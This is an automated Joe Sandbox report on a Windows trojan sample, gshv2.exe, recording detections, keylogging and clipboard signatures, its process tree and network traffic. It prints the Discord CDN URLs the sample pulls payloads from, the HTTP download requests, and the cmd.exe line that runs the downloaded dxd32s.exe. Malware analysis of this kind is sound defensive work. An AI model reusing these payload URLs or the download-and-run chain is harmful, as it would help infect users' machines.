Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gshv2.exe

Overview

General Information

Sample name:gshv2.exe
Analysis ID:1581356
MD5:27f0e3dbf939ae14775e062a8445f0e5
SHA1:502104b0540cf3a031c7d1aa3704946bdc253b72
SHA256:7536d907def00cb0b8948d7651697a670d15b85545480931ea6de7f637ea4502
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found API chain matching a thread downloading files from the Internet
Machine Learning detection for sample
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential key logger detected (key state polling based)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • gshv2.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\gshv2.exe" MD5: 27F0E3DBF939AE14775E062A8445F0E5)
    • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T13:34:57.890716+010020225501A Network Trojan was detected192.168.2.449732162.159.129.233443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: gshv2.exeAvira: detected
Source: gshv2.exeVirustotal: Detection: 68%Perma Link
Source: gshv2.exeReversingLabs: Detection: 54%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: gshv2.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: gshv2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: C:\Users\user\Desktop\gshv2.exeInternet file download: CreateThread, URLDownloadToFilegraph_0-9267
Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.4:49732 -> 162.159.129.233:443
Source: global trafficHTTP traffic detected: GET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CCFD0 URLDownloadToFileA,SleepEx,system,CreateThread,URLDownloadToFileW,CreateFileW,GetStdHandle,SetConsoleTextAttribute,SleepEx,exit,SetConsoleTitleA,GetLastError,FormatMessageA,GetStdHandle,SetConsoleTextAttribute,Sleep,system,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,0_2_00007FF62C0CCFD0
Source: global trafficHTTP traffic detected: GET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000
Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Dec 2024 12:34:57 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; path=/; expires=Fri, 27-Dec-24 13:04:57 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=898Eminxt%2FiRtRfKNZ0XB8iQQMwMXXeNfTrElGiP02RY0Pk5KuItFVq%2F59fSQZ1tuBf7SlklTFbCKo9LAMEQuiQuMEp%2BwclXz8Y4nl8Gm%2FxZfWy5D0g6WEiQeQKliF16bRY2tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f8959067fb780e2-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Dec 2024 12:35:05 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C%2FZUX%2BBE3akSylxAb9CToCJGmDjyAU3CHzntD4QmbR9Ddx5Okl3Hm9ggR2YTwkNsVVVRFUPFKQJLjy4qD7ZsuDF1cjTWP7woS2MtP7beWmDTSc1PDL%2BkS7cOxeDXZRLwKLUzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpServer: cloudflareCF-RAY: 8f8959347bbb42ea-EWRalt-svc: h3=":443"; ma=86400
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/L
Source: gshv2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe
Source: gshv2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exeC:
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exendowsF
Source: gshv2.exe, 00000000.00000003.1666174920.0000021F538E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exer
Source: gshv2.exe, gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmp, gshv2.exe, 00000000.00000002.1759636616.0000021F538E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe.
Source: gshv2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe03:21:08
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe11
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe:
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exer
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B1A40 _Init_thread_footer,free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,0_2_00007FF62C0B1A40
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B1BB0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF62C0B1BB0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B1A40 _Init_thread_footer,free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,0_2_00007FF62C0B1A40
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C73B0 GetAsyncKeyState,SleepEx,0_2_00007FF62C0C73B0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C9F80 GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetCursorPos,0_2_00007FF62C0C9F80
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CCFD0: URLDownloadToFileA,SleepEx,system,CreateThread,URLDownloadToFileW,CreateFileW,GetStdHandle,SetConsoleTextAttribute,SleepEx,exit,SetConsoleTitleA,GetLastError,FormatMessageA,GetStdHandle,SetConsoleTextAttribute,Sleep,system,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,0_2_00007FF62C0CCFD0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CCFD00_2_00007FF62C0CCFD0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B4D500_2_00007FF62C0B4D50
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0AD5700_2_00007FF62C0AD570
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0BFD600_2_00007FF62C0BFD60
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B9DD00_2_00007FF62C0B9DD0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B99D00_2_00007FF62C0B99D0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0AB6220_2_00007FF62C0AB622
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B36500_2_00007FF62C0B3650
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B76500_2_00007FF62C0B7650
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0A2E500_2_00007FF62C0A2E50
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0AFA700_2_00007FF62C0AFA70
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0BEA900_2_00007FF62C0BEA90
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C66A00_2_00007FF62C0C66A0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C4B000_2_00007FF62C0C4B00
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CE3000_2_00007FF62C0CE300
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B97300_2_00007FF62C0B9730
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C53300_2_00007FF62C0C5330
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B83400_2_00007FF62C0B8340
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B5F700_2_00007FF62C0B5F70
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C9F800_2_00007FF62C0C9F80
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C43D00_2_00007FF62C0C43D0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C73E00_2_00007FF62C0C73E0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B00000_2_00007FF62C0B0000
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C08600_2_00007FF62C0C0860
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B7C800_2_00007FF62C0B7C80
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B94800_2_00007FF62C0B9480
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C20B00_2_00007FF62C0C20B0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0B88D00_2_00007FF62C0B88D0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0BC9100_2_00007FF62C0BC910
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0BB9300_2_00007FF62C0BB930
Source: classification engineClassification label: mal68.winEXE@4/1@1/1
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CCFD0 URLDownloadToFileA,SleepEx,system,CreateThread,URLDownloadToFileW,CreateFileW,GetStdHandle,SetConsoleTextAttribute,SleepEx,exit,SetConsoleTitleA,GetLastError,FormatMessageA,GetStdHandle,SetConsoleTextAttribute,Sleep,system,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,FindWindowA,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,GetStdHandle,SetConsoleTextAttribute,Sleep,system,GetWindowThreadProcessId,GetWindowRect,DeviceIoControl,GetStdHandle,SetConsoleTextAttribute,CreateThread,CloseHandle,0_2_00007FF62C0CCFD0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
Source: gshv2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gshv2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: gshv2.exeVirustotal: Detection: 68%
Source: gshv2.exeReversingLabs: Detection: 54%
Source: unknownProcess created: C:\Users\user\Desktop\gshv2.exe "C:\Users\user\Desktop\gshv2.exe"
Source: C:\Users\user\Desktop\gshv2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gshv2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe
Source: C:\Users\user\Desktop\gshv2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exeJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: gshv2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: gshv2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: gshv2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gshv2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gshv2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gshv2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gshv2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gshv2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0A5E5D push rdi; retf 0002h0_2_00007FF62C0A5E5E
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0AB462 push rdi; ret 0_2_00007FF62C0AB468
Source: C:\Users\user\Desktop\gshv2.exeAPI coverage: 3.2 %
Source: gshv2.exe, 00000000.00000002.1759636616.0000021F538C2000.00000004.00000020.00020000.00000000.sdmp, gshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0D00D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C0D00D0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0D027C SetUnhandledExceptionFilter,0_2_00007FF62C0D027C
